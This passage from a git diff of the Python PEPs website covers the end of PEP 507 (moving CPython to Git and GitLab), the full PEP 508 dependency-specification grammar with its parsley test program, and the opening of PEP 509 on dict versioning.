Version Control System

+

Currently the CPython and supporting repositories use Mercurial. As a +modern distributed version control system, it has served us well since +the migration from Subversion. However, when evaluating the VCS we +must consider the capabilities of the VCS itself as well as the +network effect and mindshare of the community around that VCS.

+

There are really only two real options for this, Mercurial and Git. +The technical capabilities of the two systems are largely equivalent, +therefore this PEP instead focuses on their social aspects.

+

It is not possible to get exact numbers for the number of projects or +people which are using a particular VCS, however we can infer this by +looking at several sources of information for what VCS projects are +using.

+

The Open Hub (previously Ohloh) statistics [1] show that +37% of the repositories indexed by The Open Hub are using Git (second +only to Subversion which has 48%) while Mercurial has just 2%, beating +only Bazaar which has 1%. This has Git being just over 18 times as +popular as Mercurial on The Open Hub.

+

Another source of information on VCS popularity is PyPI itself. This +source is more targeted at the Python community itself since it +represents projects developed for Python. Unfortunately PyPI does not +have a standard location for representing this information, so this +requires manual processing. If we limit our search to the top 100 +projects on PyPI (ordered by download counts) we can see that 62% of +them use Git, while 22% of them use Mercurial, and 13% use something +else. This has Git being just under 3 times as popular as Mercurial +for the top 100 projects on PyPI.

+

These numbers back up the anecdotal evidence for Git as the far more +popular DVCS for open source projects. Choosing the more popular VCS +has a number of positive benefits.

+

For new contributors it increases the likelihood that they will have already +learned the basics of Git as part of working with another project or if they +are just now learning Git, that they’ll be able to take that knowledge and +apply it to other projects. Additionally a larger community means more people +writing how to guides, answering questions, and writing articles about Git +which makes it easier for a new user to find answers and information about the +tool they are trying to learn and use. Given its popularity, there may also +be more auxiliary tooling written around Git. This increases options for +everything from GUI clients, helper scripts, repository hosting, etc.

+

Further, the adoption of Git as the proposed back-end repository +format doesn’t prohibit the use of Mercurial by fans of that VCS! +Mercurial users have the [2] plugin which allows them to push +and pull from a Git server using the Mercurial front-end. It’s a +well-maintained and highly functional plugin that seems to be +well-liked by Mercurial users.

+
+
+

Repository Hosting

+

Where and how the official repositories for CPython are hosted is in +someways determined by the choice of VCS. With Git there are several +options. In fact, once the repository is hosted in Git, branches can +be mirrored in many locations, within many free, open, and proprietary +code hosting sites.

+

It’s still important for CPython to adopt a single, official +repository, with a web front-end that allows for many convenient and +common interactions entirely through the web, without always requiring +local VCS manipulations. These interactions include as a minimum, +code review with inline comments, branch diffing, CI integration, and +auto-merging.

+

This PEP proposes to adopt a [3] instance, run within the +python.org domain, accessible to and with ultimate control from the +PSF and the Python infrastructure team, but donated, hosted, and +primarily maintained by GitLab, Inc.

+

Why GitLab? Because it is a fully functional Git hosting system, that +sports modern web interactions, software workflows, and CI +integration. GitLab’s Community Edition (CE) is open source software, +and thus is closely aligned with the principles of the CPython +community.

+
+
+

Code Review

+

Currently CPython uses a custom fork of Rietveld modified to not run +on Google App Engine and which is currently only really maintained by +one person. It is missing common features present in many modern code +review tools.

+

This PEP proposes to utilize GitLab’s built-in merge requests and +online code review features to facilitate reviews of all proposed +changes.

+
+
+

GitLab merge requests

+

The normal workflow for a GitLab hosted project is to submit a merge request +asking that a feature or bug fix branch be merged into a target branch, +usually one or more of the stable maintenance branches or the next-version +master branch for new features. GitLab’s merge requests are similar in form +and function to GitHub’s pull requests, so anybody who is already familiar +with the latter should be able to immediately utilize the former.

+

Once submitted, a conversation about the change can be had between the +submitter and reviewer. This includes both general comments, and inline +comments attached to a particular line of the diff between the source and +target branches. Projects can also be configured to automatically run +continuous integration on the submitted branch, the results of which are +readily visible from the merge request page. Thus both the reviewer and +submitter can immediately see the results of the tests, making it much easier +to only land branches with passing tests. Each new push to the source branch +(e.g. to respond to a commenter’s feedback or to fix a failing test) results +in a new run of the CI, so that the state of the request always reflects the +latest commit.

+

Merge requests have a fairly major advantage over the older “submit a patch to +a bug tracker” model. They allow developers to work completely within the VCS +using standard VCS tooling, without requiring the creation of a patch file or +figuring out the right location to upload the patch to. This lowers the +barrier for sending a change to be reviewed.

+

Merge requests are far easier to review. For example, they provide nice +syntax highlighted diffs which can operate in either unified or side by side +views. They allow commenting inline and on the merge request as a whole and +they present that in a nice unified way which will also hide comments which no +longer apply. Comments can be hidden and revealed.

+

Actually merging a merge request is quite simple, if the source branch applies +cleanly to the target branch. A core reviewer simply needs to press the +“Merge” button for GitLab to automatically perform the merge. The source +branch can be optionally rebased, and once the merge is completed, the source +branch can be automatically deleted.

+

GitLab also has a good workflow for submitting pull requests to a project +completely through their web interface. This would enable the Python +documentation to have “Edit on GitLab” buttons on every page and people who +discover things like typos, inaccuracies, or just want to make improvements to +the docs they are currently reading. They can simply hit that button and get +an in browser editor that will let them make changes and submit a merge +request all from the comfort of their browser.

+
+
+
+

Criticism

+
+

X is not written in Python

+

One feature that the current tooling (Mercurial, Rietveld) has is that the +primary language for all of the pieces are written in Python. This PEP +focuses more on the best tools for the job and not necessarily on the best +tools that happen to be written in Python. Volunteer time is the most +precious resource for any open source project and we can best respect and +utilize that time by focusing on the benefits and downsides of the tools +themselves rather than what language their authors happened to write them in.

+

One concern is the ability to modify tools to work for us, however one of the +Goals here is to not modify software to work for us and instead adapt +ourselves to a more standardized workflow. This standardization pays off in +the ability to re-use tools out of the box freeing up developer time to +actually work on Python itself as well as enabling knowledge sharing between +projects.

+

However, if we do need to modify the tooling, Git itself is largely written in +C the same as CPython itself. It can also have commands written for it using +any language, including Python. GitLab itself is largely written in Ruby and +since it is Open Source software, we would have the ability to submit merge +requests to the upstream Community Edition, albeit in language potentially +unfamiliar to most Python programmers.

+
+
+

Mercurial is better than Git

+

Whether Mercurial or Git is better on a technical level is a highly subjective +opinion. This PEP does not state whether the mechanics of Git or Mercurial +are better, and instead focuses on the network effect that is available for +either option. While this PEP proposes switching to Git, Mercurial users are +not left completely out of the loop. By using the hg-git extension for +Mercurial, working with server-side Git repositories is fairly easy and +straightforward.

+
+
+

CPython Workflow is too Complicated

+

One sentiment that came out of previous discussions was that the multi-branch +model of CPython was too complicated for GitLab style merge requests. This +PEP disagrees with that sentiment.

+

Currently any particular change requires manually creating a patch for 2.7 and +3.x which won’t change at all in this regards.

+

If someone submits a fix for the current stable branch (e.g. 3.5) the merge +request workflow can be used to create a request to merge the current stable +branch into the master branch, assuming there is no merge conflicts. As +always, merge conflicts must be manually and locally resolved. Because +developers also have the option of performing the merge locally, this +provides an improvement over the current situation where the merge must +always happen locally.

+

For fixes in the current development branch that must also be applied to +stable release branches, it is possible in many situations to locally cherry +pick and apply the change to other branches, with merge requests submitted for +each stable branch. It is also possible just cherry pick and complete the +merge locally. These are all accomplished with standard Git commands and +techniques, with the advantage that all such changes can go through the review +and CI test workflows, even for merges to stable branches. Minor changes may +be easily accomplished in the GitLab web editor.

+

No system can hide all the complexities involved in maintaining several long +lived branches. The only thing that the tooling can do is make it as easy as +possible to submit and commit changes.

+
+
+
+

Open issues

+
    +
  • What level of hosted support will GitLab offer? The PEP author has been in +contact with the GitLab CEO, with positive interest on their part. The +details of the hosting offer would have to be discussed.
  • +
  • What happens to Roundup and do we switch to the GitLab issue tracker? +Currently, this PEP is not suggesting we move from Roundup to GitLab +issues. We have way too much invested in Roundup right now and migrating +the data would be a huge effort. GitLab does support webhooks, so we will +probably want to use webhooks to integrate merges and other events with +updates to Roundup (e.g. to include pointers to commits, close issues, +etc. similar to what is currently done).
  • +
  • What happens to wiki.python.org? Nothing! While GitLab does support wikis +in repositories, there’s no reason for us to migration our Moin wikis.
  • +
  • What happens to the existing GitHub mirrors? We’d probably want to +regenerate them once the official upstream branches are natively hosted in +Git. This may change commit ids, but after that, it should be easy to +mirror the official Git branches and repositories far and wide.
  • +
  • Where would the GitLab instance live? Physically, in whatever hosting +provider GitLab chooses. We would point gitlab.python.org (or +git.python.org?) to this host.
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0507.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0508/index.html b/pep-0508/index.html new file mode 100644 index 00000000000..877ad374655 --- /dev/null +++ b/pep-0508/index.html @@ -0,0 +1,701 @@ + + + + + + + + PEP 508 – Dependency specification for Python Software Packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 508 – Dependency specification for Python Software Packages

+
+
Author:
+
Robert Collins <rbtcollins at hp.com>
+
BDFL-Delegate:
+
Donald Stufft <donald at stufft.io>
+
Discussions-To:
+
Distutils-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
11-Nov-2015
+
Post-History:
+
05-Nov-2015, 16-Nov-2015
+
Resolution:
+
Distutils-SIG message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP specifies the language used to describe dependencies for packages. +It draws a border at the edge of describing a single dependency - the +different sorts of dependencies and when they should be installed is a higher +level problem. The intent is to provide a building block for higher layer +specifications.

+

The job of a dependency is to enable tools like pip [1] to find the right +package to install. Sometimes this is very loose - just specifying a name, and +sometimes very specific - referring to a specific file to install. Sometimes +dependencies are only relevant in one platform, or only some versions are +acceptable, so the language permits describing all these cases.

+

The language defined is a compact line based format which is already in +widespread use in pip requirements files, though we do not specify the command +line option handling that those files permit. There is one caveat - the +URL reference form, specified in PEP 440 is not actually +implemented in pip, but since PEP 440 is accepted, we use that format rather +than pip’s current native format.

+
+
+

Motivation

+

Any specification in the Python packaging ecosystem that needs to consume +lists of dependencies needs to build on an approved PEP for such, but +PEP 426 is mostly aspirational - and there are already existing +implementations of the dependency specification which we can instead adopt. +The existing implementations are battle proven and user friendly, so adopting +them is arguably much better than approving an aspirational, unconsumed, format.

+
+
+

Specification

+
+

Examples

+

All features of the language shown with a name based lookup:

+
requests [security,tests] >= 2.8.1, == 2.8.* ; python_version < "2.7"
+
+
+

A minimal URL based lookup:

+
pip @ https://github.com/pypa/pip/archive/1.3.1.zip#sha1=da9234ee9982d4bbb3c72346a6de940a148ea686
+
+
+
+
+

Concepts

+

A dependency specification always specifies a distribution name. It may +include extras, which expand the dependencies of the named distribution to +enable optional features. The version installed can be controlled using +version limits, or giving the URL to a specific artifact to install. Finally +the dependency can be made conditional using environment markers.

+
+
+

Grammar

+

We first cover the grammar briefly and then drill into the semantics of each +section later.

+

A distribution specification is written in ASCII text. We use a parsley +[2] grammar to provide a precise grammar. It is expected that the +specification will be embedded into a larger system which offers framing such +as comments, multiple line support via continuations, or other such features.

+

The full grammar including annotations to build a useful parse tree is +included at the end of the PEP.

+

Versions may be specified according to the PEP 440 rules. (Note: +URI is defined in std-66):

+
version_cmp   = wsp* '<' | '<=' | '!=' | '==' | '>=' | '>' | '~=' | '==='
+version       = wsp* ( letterOrDigit | '-' | '_' | '.' | '*' | '+' | '!' )+
+version_one   = version_cmp version wsp*
+version_many  = version_one (wsp* ',' version_one)*
+versionspec   = ( '(' version_many ')' ) | version_many
+urlspec       = '@' wsp* <URI_reference>
+
+
+

Environment markers allow making a specification only take effect in some +environments:

+
marker_op     = version_cmp | (wsp* 'in') | (wsp* 'not' wsp+ 'in')
+python_str_c  = (wsp | letter | digit | '(' | ')' | '.' | '{' | '}' |
+                 '-' | '_' | '*' | '#' | ':' | ';' | ',' | '/' | '?' |
+                 '[' | ']' | '!' | '~' | '`' | '@' | '$' | '%' | '^' |
+                 '&' | '=' | '+' | '|' | '<' | '>' )
+dquote        = '"'
+squote        = '\\''
+python_str    = (squote (python_str_c | dquote)* squote |
+                 dquote (python_str_c | squote)* dquote)
+env_var       = ('python_version' | 'python_full_version' |
+                 'os_name' | 'sys_platform' | 'platform_release' |
+                 'platform_system' | 'platform_version' |
+                 'platform_machine' | 'platform_python_implementation' |
+                 'implementation_name' | 'implementation_version' |
+                 'extra' # ONLY when defined by a containing layer
+                 )
+marker_var    = wsp* (env_var | python_str)
+marker_expr   = marker_var marker_op marker_var
+              | wsp* '(' marker wsp* ')'
+marker_and    = marker_expr wsp* 'and' marker_expr
+              | marker_expr
+marker_or     = marker_and wsp* 'or' marker_and
+                  | marker_and
+marker        = marker_or
+quoted_marker = ';' wsp* marker
+
+
+

Optional components of a distribution may be specified using the extras +field:

+
identifier_end = letterOrDigit | (('-' | '_' | '.' )* letterOrDigit)
+identifier    = letterOrDigit identifier_end*
+name          = identifier
+extras_list   = identifier (wsp* ',' wsp* identifier)*
+extras        = '[' wsp* extras_list? wsp* ']'
+
+
+

Giving us a rule for name based requirements:

+
name_req      = name wsp* extras? wsp* versionspec? wsp* quoted_marker?
+
+
+

And a rule for direct reference specifications:

+
url_req       = name wsp* extras? wsp* urlspec wsp+ quoted_marker?
+
+
+

Leading to the unified rule that can specify a dependency.:

+
specification = wsp* ( url_req | name_req ) wsp*
+
+
+
+
+

Whitespace

+

Non line-breaking whitespace is mostly optional with no semantic meaning. The +sole exception is detecting the end of a URL requirement.

+
+
+

Names

+

Python distribution names are currently defined in PEP 345. Names +act as the primary identifier for distributions. They are present in all +dependency specifications, and are sufficient to be a specification on their +own. However, PyPI places strict restrictions on names - they must match a +case insensitive regex or they won’t be accepted. Accordingly, in this PEP we +limit the acceptable values for identifiers to that regex. A full redefinition +of name may take place in a future metadata PEP. The regex (run with +re.IGNORECASE) is:

+
^([A-Z0-9]|[A-Z0-9][A-Z0-9._-]*[A-Z0-9])$
+
+
+
+
+

Extras

+

An extra is an optional part of a distribution. Distributions can specify as +many extras as they wish, and each extra results in the declaration of +additional dependencies of the distribution when the extra is used in a +dependency specification. For instance:

+
requests[security]
+
+
+

Extras union in the dependencies they define with the dependencies of the +distribution they are attached to. The example above would result in requests +being installed, and requests own dependencies, and also any dependencies that +are listed in the “security” extra of requests.

+

If multiple extras are listed, all the dependencies are unioned together.

+
+
+

Versions

+

See PEP 440 for more detail on both version numbers and version +comparisons. Version specifications limit the versions of a distribution that +can be used. They only apply to distributions looked up by name, rather than +via a URL. Version comparison are also used in the markers feature. The +optional brackets around a version are present for compatibility with PEP 345 +but should not be generated, only accepted.

+
+
+

Environment Markers

+

Environment markers allow a dependency specification to provide a rule that +describes when the dependency should be used. For instance, consider a package +that needs argparse. In Python 2.7 argparse is always present. On older Python +versions it has to be installed as a dependency. This can be expressed as so:

+
argparse;python_version<"2.7"
+
+
+

A marker expression evaluates to either True or False. When it evaluates to +False, the dependency specification should be ignored.

+

The marker language is inspired by Python itself, chosen for the ability to +safely evaluate it without running arbitrary code that could become a security +vulnerability. Markers were first standardised in PEP 345. This PEP +fixes some issues that were observed in the design described in PEP 426.

+

Comparisons in marker expressions are typed by the comparison operator. The +<marker_op> operators that are not in <version_cmp> perform the same as they +do for strings in Python. The <version_cmp> operators use the PEP 440 +version comparison rules when those are defined (that is when both +sides have a valid version specifier). If there is no defined PEP 440 +behaviour and the operator exists in Python, then the operator falls back to +the Python behaviour. Otherwise an error should be raised. e.g. the following +will result in errors:

+
"dog" ~= "fred"
+python_version ~= "surprise"
+
+
+

User supplied constants are always encoded as strings with either ' or +" quote marks. Note that backslash escapes are not defined, but existing +implementations do support them. They are not included in this +specification because they add complexity and there is no observable need for +them today. Similarly we do not define non-ASCII character support: all the +runtime variables we are referencing are expected to be ASCII-only.

+

The variables in the marker grammar such as “os_name” resolve to values looked +up in the Python runtime. With the exception of “extra” all values are defined +on all Python versions today - it is an error in the implementation of markers +if a value is not defined.

+

Unknown variables must raise an error rather than resulting in a comparison +that evaluates to True or False.

+

Variables whose value cannot be calculated on a given Python implementation +should evaluate to 0 for versions, and an empty string for all other +variables.

+

The “extra” variable is special. It is used by wheels to signal which +specifications apply to a given extra in the wheel METADATA file, but +since the METADATA file is based on a draft version of PEP 426, there is +no current specification for this. Regardless, outside of a context where this +special handling is taking place, the “extra” variable should result in an +error like all other unknown variables.

+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
MarkerPython equivalentSample values
os_nameos.nameposix, java
sys_platformsys.platformlinux, linux2, darwin, java1.8.0_51 (note that “linux” +is from Python3 and “linux2” from Python2)
platform_machineplatform.machine()x86_64
platform_python_implementationplatform.python_implementation()CPython, Jython
platform_releaseplatform.release()3.14.1-x86_64-linode39, 14.5.0, 1.8.0_51
platform_systemplatform.system()Linux, Windows, Java
platform_versionplatform.version()#1 SMP Fri Apr 25 13:07:35 EDT 2014 +Java HotSpot(TM) 64-Bit Server VM, 25.51-b03, Oracle Corporation +Darwin Kernel Version 14.5.0: Wed Jul 29 02:18:53 PDT 2015; root:xnu-2782.40.9~2/RELEASE_X86_64
python_version'.'.join(platform.python_version_tuple()[:2])3.4, 2.7
python_full_versionplatform.python_version()3.4.0, 3.5.0b1
implementation_namesys.implementation.namecpython
implementation_versionsee definition below3.4.0, 3.5.0b1
extraAn error except when defined by the context interpreting the +specification.test
+

The implementation_version marker variable is derived from +sys.implementation.version:

+
def format_full_version(info):
+    version = '{0.major}.{0.minor}.{0.micro}'.format(info)
+    kind = info.releaselevel
+    if kind != 'final':
+        version += kind[0] + str(info.serial)
+    return version
+
+if hasattr(sys, 'implementation'):
+    implementation_version = format_full_version(sys.implementation.version)
+else:
+    implementation_version = "0"
+
+
+
+
+
+

Backwards Compatibility

+

Most of this PEP is already widely deployed and thus offers no compatibility +concerns.

+

There are however a few points where the PEP differs from the deployed base.

+

Firstly, PEP 440 direct references haven’t actually been deployed in the wild, +but they were designed to be compatibly added, and there are no known +obstacles to adding them to pip or other tools that consume the existing +dependency metadata in distributions - particularly since they won’t be +permitted to be present in PyPI uploaded distributions anyway.

+

Secondly, PEP 426 markers which have had some reasonable deployment, +particularly in wheels and pip, will handle version comparisons with +python_full_version “2.7.10” differently. Specifically in 426 “2.7.10” is +less than “2.7.9”. This backward incompatibility is deliberate. We are also +defining new operators - “~=” and “===”, and new variables - +platform_release, platform_system, implementation_name, and +implementation_version which are not present in older marker +implementations. The variables will error on those implementations. Users of +both features will need to make a judgement as to when support has become +sufficiently widespread in the ecosystem that using them will not cause +compatibility issues.

+

Thirdly, PEP 345 required brackets around version specifiers. In order to +accept PEP 345 dependency specifications, brackets are accepted, but they +should not be generated.

+
+
+

Rationale

+

In order to move forward with any new PEPs that depend on environment markers, +we needed a specification that included them in their modern form. This PEP +brings together all the currently unspecified components into a specified +form.

+

The requirement specifier was adopted from the EBNF in the setuptools +pkg_resources documentation, since we wish to avoid depending on a de facto, vs +PEP specified, standard.

+
+
+

Complete Grammar

+

The complete parsley grammar:

+
wsp           = ' ' | '\t'
+version_cmp   = wsp* <'<=' | '<' | '!=' | '==' | '>=' | '>' | '~=' | '==='>
+version       = wsp* <( letterOrDigit | '-' | '_' | '.' | '*' | '+' | '!' )+>
+version_one   = version_cmp:op version:v wsp* -> (op, v)
+version_many  = version_one:v1 (wsp* ',' version_one)*:v2 -> [v1] + v2
+versionspec   = ('(' version_many:v ')' ->v) | version_many
+urlspec       = '@' wsp* <URI_reference>
+marker_op     = version_cmp | (wsp* 'in') | (wsp* 'not' wsp+ 'in')
+python_str_c  = (wsp | letter | digit | '(' | ')' | '.' | '{' | '}' |
+                 '-' | '_' | '*' | '#' | ':' | ';' | ',' | '/' | '?' |
+                 '[' | ']' | '!' | '~' | '`' | '@' | '$' | '%' | '^' |
+                 '&' | '=' | '+' | '|' | '<' | '>' )
+dquote        = '"'
+squote        = '\\''
+python_str    = (squote <(python_str_c | dquote)*>:s squote |
+                 dquote <(python_str_c | squote)*>:s dquote) -> s
+env_var       = ('python_version' | 'python_full_version' |
+                 'os_name' | 'sys_platform' | 'platform_release' |
+                 'platform_system' | 'platform_version' |
+                 'platform_machine' | 'platform_python_implementation' |
+                 'implementation_name' | 'implementation_version' |
+                 'extra' # ONLY when defined by a containing layer
+                 ):varname -> lookup(varname)
+marker_var    = wsp* (env_var | python_str)
+marker_expr   = marker_var:l marker_op:o marker_var:r -> (o, l, r)
+              | wsp* '(' marker:m wsp* ')' -> m
+marker_and    = marker_expr:l wsp* 'and' marker_expr:r -> ('and', l, r)
+              | marker_expr:m -> m
+marker_or     = marker_and:l wsp* 'or' marker_and:r -> ('or', l, r)
+                  | marker_and:m -> m
+marker        = marker_or
+quoted_marker = ';' wsp* marker
+identifier_end = letterOrDigit | (('-' | '_' | '.' )* letterOrDigit)
+identifier    = < letterOrDigit identifier_end* >
+name          = identifier
+extras_list   = identifier:i (wsp* ',' wsp* identifier)*:ids -> [i] + ids
+extras        = '[' wsp* extras_list?:e wsp* ']' -> e
+name_req      = (name:n wsp* extras?:e wsp* versionspec?:v wsp* quoted_marker?:m
+                 -> (n, e or [], v or [], m))
+url_req       = (name:n wsp* extras?:e wsp* urlspec:v (wsp+ | end) quoted_marker?:m
+                 -> (n, e or [], v, m))
+specification = wsp* ( url_req | name_req ):s wsp* -> s
+# The result is a tuple - name, list-of-extras,
+# list-of-version-constraints-or-a-url, marker-ast or None
+
+
+URI_reference = <URI | relative_ref>
+URI           = scheme ':' hier_part ('?' query )? ( '#' fragment)?
+hier_part     = ('//' authority path_abempty) | path_absolute | path_rootless | path_empty
+absolute_URI  = scheme ':' hier_part ( '?' query )?
+relative_ref  = relative_part ( '?' query )? ( '#' fragment )?
+relative_part = '//' authority path_abempty | path_absolute | path_noscheme | path_empty
+scheme        = letter ( letter | digit | '+' | '-' | '.')*
+authority     = ( userinfo '@' )? host ( ':' port )?
+userinfo      = ( unreserved | pct_encoded | sub_delims | ':')*
+host          = IP_literal | IPv4address | reg_name
+port          = digit*
+IP_literal    = '[' ( IPv6address | IPvFuture) ']'
+IPvFuture     = 'v' hexdig+ '.' ( unreserved | sub_delims | ':')+
+IPv6address   = (
+                  ( h16 ':'){6} ls32
+                  | '::' ( h16 ':'){5} ls32
+                  | ( h16 )?  '::' ( h16 ':'){4} ls32
+                  | ( ( h16 ':')? h16 )? '::' ( h16 ':'){3} ls32
+                  | ( ( h16 ':'){0,2} h16 )? '::' ( h16 ':'){2} ls32
+                  | ( ( h16 ':'){0,3} h16 )? '::' h16 ':' ls32
+                  | ( ( h16 ':'){0,4} h16 )? '::' ls32
+                  | ( ( h16 ':'){0,5} h16 )? '::' h16
+                  | ( ( h16 ':'){0,6} h16 )? '::' )
+h16           = hexdig{1,4}
+ls32          = ( h16 ':' h16) | IPv4address
+IPv4address   = dec_octet '.' dec_octet '.' dec_octet '.' dec_octet
+nz            = ~'0' digit
+dec_octet     = (
+                  digit # 0-9
+                  | nz digit # 10-99
+                  | '1' digit{2} # 100-199
+                  | '2' ('0' | '1' | '2' | '3' | '4') digit # 200-249
+                  | '25' ('0' | '1' | '2' | '3' | '4' | '5') )# %250-255
+reg_name = ( unreserved | pct_encoded | sub_delims)*
+path = (
+        path_abempty # begins with '/' or is empty
+        | path_absolute # begins with '/' but not '//'
+        | path_noscheme # begins with a non-colon segment
+        | path_rootless # begins with a segment
+        | path_empty ) # zero characters
+path_abempty  = ( '/' segment)*
+path_absolute = '/' ( segment_nz ( '/' segment)* )?
+path_noscheme = segment_nz_nc ( '/' segment)*
+path_rootless = segment_nz ( '/' segment)*
+path_empty    = pchar{0}
+segment       = pchar*
+segment_nz    = pchar+
+segment_nz_nc = ( unreserved | pct_encoded | sub_delims | '@')+
+                # non-zero-length segment without any colon ':'
+pchar         = unreserved | pct_encoded | sub_delims | ':' | '@'
+query         = ( pchar | '/' | '?')*
+fragment      = ( pchar | '/' | '?')*
+pct_encoded   = '%' hexdig
+unreserved    = letter | digit | '-' | '.' | '_' | '~'
+reserved      = gen_delims | sub_delims
+gen_delims    = ':' | '/' | '?' | '#' | '(' | ')?' | '@'
+sub_delims    = '!' | '$' | '&' | '\\'' | '(' | ')' | '*' | '+' | ',' | ';' | '='
+hexdig        = digit | 'a' | 'A' | 'b' | 'B' | 'c' | 'C' | 'd' | 'D' | 'e' | 'E' | 'f' | 'F'
+
+
+

A test program - if the grammar is in a string grammar:

+
import os
+import sys
+import platform
+
+from parsley import makeGrammar
+
+grammar = """
+    wsp ...
+    """
+tests = [
+    "A",
+    "A.B-C_D",
+    "aa",
+    "name",
+    "name<=1",
+    "name>=3",
+    "name>=3,<2",
+    "name@http://foo.com",
+    "name [fred,bar] @ http://foo.com ; python_version=='2.7'",
+    "name[quux, strange];python_version<'2.7' and platform_version=='2'",
+    "name; os_name=='a' or os_name=='b'",
+    # Should parse as (a and b) or c
+    "name; os_name=='a' and os_name=='b' or os_name=='c'",
+    # Overriding precedence -> a and (b or c)
+    "name; os_name=='a' and (os_name=='b' or os_name=='c')",
+    # should parse as a or (b and c)
+    "name; os_name=='a' or os_name=='b' and os_name=='c'",
+    # Overriding precedence -> (a or b) and c
+    "name; (os_name=='a' or os_name=='b') and os_name=='c'",
+    ]
+
+def format_full_version(info):
+    version = '{0.major}.{0.minor}.{0.micro}'.format(info)
+    kind = info.releaselevel
+    if kind != 'final':
+        version += kind[0] + str(info.serial)
+    return version
+
+if hasattr(sys, 'implementation'):
+    implementation_version = format_full_version(sys.implementation.version)
+    implementation_name = sys.implementation.name
+else:
+    implementation_version = '0'
+    implementation_name = ''
+bindings = {
+    'implementation_name': implementation_name,
+    'implementation_version': implementation_version,
+    'os_name': os.name,
+    'platform_machine': platform.machine(),
+    'platform_python_implementation': platform.python_implementation(),
+    'platform_release': platform.release(),
+    'platform_system': platform.system(),
+    'platform_version': platform.version(),
+    'python_full_version': platform.python_version(),
+    'python_version': '.'.join(platform.python_version_tuple()[:2]),
+    'sys_platform': sys.platform,
+}
+
+compiled = makeGrammar(grammar, {'lookup': bindings.__getitem__})
+for test in tests:
+    parsed = compiled(test).specification()
+    print("%s -> %s" % (test, parsed))
+
+
+
+
+

Summary of changes to PEP 508

+

The following changes were made to this PEP based on feedback after its initial +implementation:

+
    +
  • The definition of python_version was changed from +platform.python_version()[:3] to +'.'.join(platform.python_version_tuple()[:2]), to accommodate potential +future versions of Python with 2-digit major and minor versions +(e.g. 3.10). [3]
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0508.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0509/index.html b/pep-0509/index.html new file mode 100644 index 00000000000..657257f1b84 --- /dev/null +++ b/pep-0509/index.html @@ -0,0 +1,657 @@ + + + + + + + + PEP 509 – Add a private version to dict | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 509 – Add a private version to dict

+
+
Author:
+
Victor Stinner <vstinner at python.org>
+
Status:
+
Superseded
+
Type:
+
Standards Track
+
Created:
+
04-Jan-2016
+
Python-Version:
+
3.6
+
Post-History:
+
08-Jan-2016, +11-Jan-2016, +14-Apr-2016, +19-Apr-2016
+
Superseded-By:
+
699
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Add a new private version to the builtin dict type, incremented at +each dictionary creation and at each dictionary change, to implement +fast guards on namespaces.

+
+
+

Rationale

+

In Python, the builtin dict type is used by many instructions. For +example, the LOAD_GLOBAL instruction looks up a variable in the +global namespace, or in the builtins namespace (two dict lookups). +Python uses dict for the builtins namespace, globals namespace, type +namespaces, instance namespaces, etc. The local namespace (function +namespace) is usually optimized to an array, but it can be a dict too.

+

Python is hard to optimize because almost everything is mutable: builtin +functions, function code, global variables, local variables, … can be +modified at runtime. Implementing optimizations respecting the Python +semantics requires to detect when “something changes”: we will call +these checks “guards”.

+

The speedup of optimizations depends on the speed of guard checks. This +PEP proposes to add a private version to dictionaries to implement fast +guards on namespaces.

+

Dictionary lookups can be skipped if the version does not change, which +is the common case for most namespaces. The version is globally unique, +so checking the version is also enough to verify that the namespace +dictionary was not replaced with a new dictionary.

+

When the dictionary version does not change, the performance of a guard +does not depend on the number of watched dictionary entries: the +complexity is O(1).

+

Example of optimization: copy the value of a global variable to function +constants. This optimization requires a guard on the global variable to +check if it was modified after it was copied. If the global variable is +not modified, the function uses the cached copy. If the global variable +is modified, the function uses a regular lookup, and maybe also +deoptimizes the function (to remove the overhead of the guard check for +next function calls).

+

See the 510 – Specialized functions with guards +for concrete usage of +guards to specialize functions and for a more general rationale on +Python static optimizers.

+
+
+

Guard example

+

Pseudo-code of a fast guard to check if a dictionary entry was modified +(created, updated or deleted) using a hypothetical +dict_get_version(dict) function:

+
UNSET = object()
+
+class GuardDictKey:
+    def __init__(self, dict, key):
+        self.dict = dict
+        self.key = key
+        self.value = dict.get(key, UNSET)
+        self.version = dict_get_version(dict)
+
+    def check(self):
+        """Return True if the dictionary entry did not change
+        and the dictionary was not replaced."""
+
+        # read the version of the dictionary
+        version = dict_get_version(self.dict)
+        if version == self.version:
+            # Fast-path: dictionary lookup avoided
+            return True
+
+        # lookup in the dictionary
+        value = self.dict.get(self.key, UNSET)
+        if value is self.value:
+            # another key was modified:
+            # cache the new dictionary version
+            self.version = version
+            return True
+
+        # the key was modified
+        return False
+
+
+
+
+

Usage of the dict version

+
+

Speedup method calls

+

Yury Selivanov wrote a patch to optimize method calls. The patch depends on the +“implement per-opcode cache in ceval” patch which requires dictionary +versions to invalidate the cache if the globals dictionary or the +builtins dictionary has been modified.

+

The cache also requires that the dictionary version is globally unique. +It is possible to define a function in a namespace and call it in a +different namespace, using exec() with the globals parameter for +example. In this case, the globals dictionary was replaced and the cache +must also be invalidated.

+
+
+

Specialized functions using guards

+

PEP 510 proposes an API to support +specialized functions with guards. It allows to implement static +optimizers for Python without breaking the Python semantics.

+

The fatoptimizer of the FAT +Python project +is an example of a static Python optimizer. It implements many +optimizations which require guards on namespaces:

+
    +
  • Call pure builtins: to replace len("abc") with 3, guards on +builtins.__dict__['len'] and globals()['len'] are required
  • +
